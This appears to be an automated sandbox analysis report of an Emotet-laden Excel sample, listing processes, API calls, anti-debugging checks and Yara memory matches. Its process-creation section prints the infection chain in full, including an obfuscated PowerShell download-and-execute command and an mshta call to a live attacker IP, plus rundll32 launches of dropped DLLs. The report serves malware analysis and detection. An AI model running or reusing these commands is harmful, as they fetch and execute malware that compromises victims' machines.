Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\mshta.exe TID: 2824

Thread sleep time: -360000s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 3.2 %

Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node			graph_9-32094
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node			graph_11-32094

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: rundll32.exe, 0000000F.00000002.656602791.00000000005DA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,

9_2_10030334

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,		9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,		11_2_10021854

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

9_2_1003D873

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_007B4087 mov eax, dword ptr fs:[00000030h]	9_2_007B4087
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00394087 mov eax, dword ptr fs:[00000030h]	10_2_00394087
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00654087 mov eax, dword ptr fs:[00000030h]	11_2_00654087
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00713487 mov eax, dword ptr fs:[00000030h]	13_2_00713487
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_006E4087 mov eax, dword ptr fs:[00000030h]	13_2_006E4087
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00264087 mov eax, dword ptr fs:[00000030h]	14_2_00264087
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00314087 mov eax, dword ptr fs:[00000030h]	15_2_00314087
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_002F4087 mov eax, dword ptr fs:[00000030h]	16_2_002F4087

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

9_2_10037657

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,

9_2_10002280

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,	9_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,	9_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,	11_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,	11_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_1003ACCC

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Yjtipscuxmuubs\fpasqaepcht.dgb",JsCTpK	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Yjtipscuxmuubs\fpasqaepcht.dgb",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Amovlkfvdj\autlietzhmzgatf.inx",XsUjAXLCR	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Amovlkfvdj\autlietzhmzgatf.inx",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Twedmet\gxkvytixybpjnz.dhj",XxjhIN	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Twedmet\gxkvytixybpjnz.dhj",DllRegisterServer	Jump to behavior

Source: Yara match	File source: 1162545482187818.xls, type: SAMPLE
Source: Yara match	File source: C:\Users\user\Desktop\1162545482187818.xls, type: DROPPED

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	9_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	9_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,	9_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	11_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	11_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,	11_2_10014B71

Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_1003DAA7 cpuid

9_2_1003DAA7

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

9_2_1003906D

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,

9_2_1003CE1A

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,

9_2_100453C8

Stealing of Sensitive Information

Yara detected Emotet

Source: Yara match	File source: 15.2.rundll32.exe.500000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.b80000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2e30000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3150000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.260000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2f10000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3120000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.4e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.340000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.700000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.22a0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.20d0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.2e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.4e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.2930000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.530000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.3070000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.20d0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.340000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.2e30000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.2740000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.3050000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.28d0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.2900000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.2e60000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2bb0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.bf0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.700000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.380000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.b50000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.28d0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.340000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.770000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.bf0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.2e00000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.7e0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2f40000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2770000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2be0000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.260000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.290000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.870000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3120000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.23e0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.23e0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.b50000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2320000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.870000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.3080000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2f10000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.25b0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.2930000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.28d0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.20a0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.2e30000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.7f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2bb0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.530000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.28d0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.3050000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.770000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.6d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.640000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.22a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.7a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.10000000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.677590438.0000000000260000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.605063883.0000000000251000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.680400324.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.656694958.00000000007E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.547984454.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.601617867.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.547866733.0000000002771000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.547659879.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.657128766.0000000003081000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.548291144.0000000003120000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.547315062.0000000000381000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.547521554.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.656764278.0000000000B81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.547234287.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.656508765.0000000000530000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.677534692.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.656455241.0000000000501000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.656807259.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
